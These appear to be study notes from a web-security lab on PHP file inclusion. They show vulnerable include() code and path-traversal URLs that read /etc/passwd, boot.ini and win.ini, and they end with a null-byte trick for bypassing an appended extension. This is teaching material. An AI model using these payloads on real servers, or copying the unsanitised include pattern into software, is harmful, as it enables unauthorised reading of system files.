File Inclusion vulnerability happens when a user can retrieve or execute command of their own because the input to the file is not sanitized properly, mostly in PHP. They could retrieve sensitive files or even perform remote code execution.
The function in php that causes this vulnerability is file_get_contents, if the input is not sanitized properly.
<http://webapp.thm/get.php?file=/var/www/app/CVs/userCV.pdf> - normal input
<http://webapp.thm/get.php?file=../../../../etc/passwd> - path traversal or dot dot dash attack.
If the server is windows based then the file to retrieve is window.ini or boot.ini.
<http://webapp.thm/get.php?file=../../../../boot.ini>
<http://webapp.thm/get.php?file=../../../../windows/win.ini>
When developer includes these functions without security awareness,
include
require
include_once
require-once
<?PHP
include($_GET["lang"]);
?>
<http://webapp.thm/index.php?lang=EN.php> - To load english page
<http://webapp.thm/index.php?lang=AR.php> - To load arabic page
This php includes file based on the language that is requested.
<http://webapp.thm/get.php?file=/etc/passwd>
This works because there is no directory mentioned in the include and no input validation.
<?PHP
include("languages/". $_GET['lang']);
?>
Now the developer has added the directory to be fetched from, here we could use path traversal to read etc/passwd.
<http://webapp.thm/index.php?lang=../../../../etc/passwd>
Sometimes the developer specifies in the include that adds .php to the input and retrieves the file accordingly.
<http://webapp.thm/index.php?lang=EN>
here the index.php has a include fucntion that retrieves EN.php
So just giving the file name will not retrieve the required file here, we have to negate the .php addition to our input so we inject null byte at the end %00.